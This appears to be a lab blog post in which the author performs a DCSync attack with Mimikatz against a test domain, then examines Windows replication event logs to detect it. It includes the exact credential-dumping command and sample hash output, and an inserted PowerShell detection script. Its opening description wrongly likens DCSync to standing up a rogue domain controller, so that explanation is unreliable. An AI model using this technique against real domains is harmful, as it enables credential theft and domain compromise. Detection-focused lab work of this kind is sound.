Sunday, January 2, 2022

Beginning DC Sync - Attack

In this post, I am learning about how we can perform and detect a DCSync attack using Mimikatz. In a DCSync attack, we stand up a normal computer to act as a domain controller. Once this "normal" computer acts like a domain controller, we can then perform replication, requesting information on a particular user or on all users if we wish.

I connected to a workstation as a user with Domain Admin privileges. 

C:\Tools\mimikatz_trunk\x64
λ whoami /upn
admin@securitynik.local

Confirming the group membership.

C:\Tools\mimikatz_trunk\x64
λ net group "Domain Admins" /domain
The request will be processed at a domain controller for domain securitynik.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
mysqlsvc                 admin                    Administrator

The command completed successfully.

Before going any further, I've configured my Windows 2019 server to track replication changes.

Group Policy Management -> My Domain Policy ("SecurityNik - Default - Domain Policy") -> Computer Configuration -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access:
    Detailed Directory Service Replication: Success and Failure
    Directory Service Access: Success and Failure
    Active Directory Domain Services Object Changes: Success and Failure
    Directory Service Replication: Success and Failure

First up, collecting information about a particular user.

C:\Tools\mimikatz_trunk\x64
λ mimikatz.exe "lsadump::dcsync /domain:securitynik.local /user:tq" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /domain:securitynik.local /user:tq
[DC] 'securitynik.local' will be the domain
[DC] 'dc-2019.securitynik.local' will be the DC server
[DC] 'tq' will be the user account

Object RDN           : tq

** SAM ACCOUNT **

SAM Username         : tq
User Principal Name  : tq@securitynik.local
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/16/2021 12:55:37 PM
Object Security ID   : S-1-5-21-2112827174-2190297626-1763567496-1104
Object Relative ID   : 1104

Credentials:
  Hash NTLM: 23e1d10001876b0078a9a779017fc026
    ntlm- 0: 23e1d10001876b0078a9a779017fc026
    ntlm- 1: 23e1d10001876b0078a9a779017fc026
    lm  - 0: 28efaa5798e5b2fedee619ea7e0116d4
    lm  - 1: df03317c4db79c05f4db99852f01f006

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 81800db4fa61ba2c6cf2164e34759c2a
...

Looking specifically at the Security event log for events with ID 4928, relating to Detailed Directory Service Replication, we see the various naming contexts being replicated with SECURITYNIK-WIN. This device is my Windows 10 host and is not a Domain Controller.

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	CN=Schema,CN=Configuration,DC=securitynik,DC=local
Options:		2147484016
Status Code:	0

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	DC=securitynik,DC=local
Options:		368
Status Code:	0
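A defender-side check built on the 4928 events above, added here as an example and not part of the original post: it reads the DC's Security log, pulls the Source DRA out of each 4928 message and flags any replication source that is not a domain controller the ActiveDirectory module knows about. The DC name, the lookback window and the availability of the ActiveDirectory module are assumptions.

```powershell
# Added example: flag 4928 (replica source naming context established) events whose
# Source DRA is not a known domain controller, e.g. a workstation such as SECURITYNIK-WIN.
# Assumes the RSAT ActiveDirectory module is installed and the caller can read the DC's
# Security log remotely. Run as an admin on a domain-joined host.
param(
    [string]$DomainController = 'dc-2019.securitynik.local',  # assumed from the post
    [int]$LookbackHours = 24
)

Import-Module ActiveDirectory

# Only these hosts should ever appear as a replication source.
$knownDCs = (Get-ADDomainController -Filter *).Name | ForEach-Object { $_.ToUpper() }

# Without this audit subcategory the DC writes no 4928 events at all; the check is only
# meaningful when this script runs on the DC itself.
if ($env:COMPUTERNAME -eq ($DomainController.Split('.')[0])) {
    $audit = auditpol /get /subcategory:"Detailed Directory Service Replication" 2>$null
    if (-not ($audit -match 'Success')) {
        Write-Warning 'Detailed Directory Service Replication auditing is not enabled'
    }
}

$events = Get-WinEvent -ComputerName $DomainController -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4928
    StartTime = (Get-Date).AddHours(-$LookbackHours)
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Message line of interest:
    #   Source DRA: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,...
    if ($e.Message -match 'Source DRA:\s*CN=NTDS Settings,CN=([^,]+),') {
        $source = $Matches[1].ToUpper()
        $nc = if ($e.Message -match 'Naming Context:\s*(.+)') { $Matches[1].Trim() } else { '?' }
        if ($knownDCs -notcontains $source) {
            [pscustomobject]@{
                TimeCreated   = $e.TimeCreated
                SourceDRA     = $source
                NamingContext = $nc
                Verdict       = 'ALERT: replication source is not a known domain controller'
            }
        }
    }
}
```

Correlating an alert from this script with Directory Service log events 1548 and 2088 for the same source GUID, as the post does below, gives a second, independent signal from the DC's own replication engine.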

Looking at Event 1548 in the Directory Service log, we see:

During replication, Active Directory Domain Services found the following object or its parent object in a directory partition on the local domain controller that is different from the following directory partition from which changes are being replicated. This can occur when the object or its parent object has been moved across partitions. However, due to replication latency, one of the directory servers has not yet received notification of the move. 
 
Object:
CN=tq,OU=SecurityNik-Users,DC=securitynik,DC=local 
Object GUID:
7b76ce2a-c5d9-42ec-b246-cba68d5d23ee 
Parent object GUID (if available):
9234d83c-d3fc-49c0-8024-2eee57d9179b 
Directory partition:
CN=Configuration,DC=securitynik,DC=local 
Source directory server:
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
 
Replication of this directory partition from this source directory server cannot continue at this time. This condition is transient. An attempt to replicate this directory partition will be tried again later.

Looking at event 2088, we see:

Invalid DNS configuration may be affecting other essential operations on member computers, domain controllers or application servers in this Active Directory Domain Services forest, including logon authentication or access to network resources. 
 
You should immediately resolve this DNS configuration error so that this domain controller can resolve the IP address of the source domain controller using DNS. 
 
Alternate server name: 
 SECURITYNIK-WIN10.securitynik.local 
Failing DNS host name: 
 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

There were quite a few errors about this failure in the Directory Service log, which might suggest this is a potential issue.

